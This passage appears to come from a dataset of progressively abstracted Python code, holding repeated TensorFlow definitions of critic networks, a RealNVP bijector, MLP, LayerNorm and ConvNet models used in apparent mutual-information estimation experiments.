of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n 
**condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
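The critic classes that persist through this step (InnerProdCritic, BilinearCritic, ConcatCritic, SeparableCritic) all produce an n x n score matrix in which entry (i, j) scores the pair (x_i, y_j) and the diagonal holds the positives. The NumPy sketch below shows the separable variant; the toy linear feature maps standing in for the MLP encoders are illustrative assumptions.

# Sketch of a separable critic: map x and y through feature maps, then take
# all pairwise inner products so that scores[i, j] = <g(x_i), h(y_j)>.
import numpy as np

rng = np.random.default_rng(1)
batch, dim, feat = 6, 16, 8
x = rng.normal(size=(batch, dim))
y = rng.normal(size=(batch, dim))

W_x = rng.normal(size=(dim, feat))   # toy stand-ins for the learned feature maps
W_y = rng.normal(size=(dim, feat))

scores = (x @ W_x) @ (y @ W_y).T     # shape (batch, batch)
print(scores.shape, "diagonal =", np.round(np.diag(scores), 2))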
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, 
axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n 
super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
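The RealNVP bijector kept in this step is an affine coupling layer: one half of the input conditions a shift and log-scale applied to the other half, which keeps the map invertible with a cheap log-determinant. The NumPy sketch below uses a fixed linear conditioner in place of the learned shift_and_log_scale_fn; that substitution is an assumption made only to keep the example self-contained.

# Sketch of one affine coupling step (RealNVP-style) with a fixed linear conditioner.
import numpy as np

rng = np.random.default_rng(2)
dim, num_masked = 8, 4
A_shift = rng.normal(size=(num_masked, dim - num_masked)) * 0.1
A_scale = rng.normal(size=(num_masked, dim - num_masked)) * 0.1

def conditioner(x0):
    return x0 @ A_shift, x0 @ A_scale        # shift, log_scale

def forward(x):
    x0, x1 = x[:, :num_masked], x[:, num_masked:]
    shift, log_scale = conditioner(x0)
    y1 = x1 * np.exp(log_scale) + shift
    log_det = log_scale.sum(axis=1)          # per-example log|det J|
    return np.concatenate([x0, y1], axis=1), log_det

def inverse(y):
    y0, y1 = y[:, :num_masked], y[:, num_masked:]
    shift, log_scale = conditioner(y0)
    x1 = (y1 - shift) * np.exp(-log_scale)
    return np.concatenate([y0, x1], axis=1)

x = rng.normal(size=(5, dim))
y, log_det = forward(x)
print(np.allclose(inverse(y), x), log_det.shape)   # True (5,)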
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name 
or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, 
activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
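The ConcatCritic in the step above scores every (x_i, y_j) pair by tiling the two batches, concatenating them, and running a single MLP over all batch_size squared pairs before reshaping back to a matrix. The NumPy sketch below mirrors that tiling and reshaping; the additive toy scoring function replacing the MLP is an assumption for illustration.

# Sketch of the concat-critic pairing: build all (x_i, y_j) combinations,
# score them with one function, and reshape back to an n x n matrix.
import numpy as np

rng = np.random.default_rng(3)
batch, dx, dy = 4, 3, 5
x = rng.normal(size=(batch, dx))
y = rng.normal(size=(batch, dy))

x_tiled = np.tile(x[None, :, :], (batch, 1, 1))      # [i, j] -> x_j
y_tiled = np.tile(y[:, None, :], (1, batch, 1))      # [i, j] -> y_i
pairs = np.concatenate([x_tiled, y_tiled], axis=2).reshape(batch * batch, -1)

def toy_score(p):                                    # stand-in for the pairwise MLP
    return p.sum(axis=1)

scores = toy_score(pairs).reshape(batch, batch).T    # scores[i, j] = f(x_i, y_j)
assert np.isclose(scores[1, 2],
                  toy_score(np.concatenate([x[1], y[2]])[None, :])[0])
print(scores.shape)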
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, 
log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, 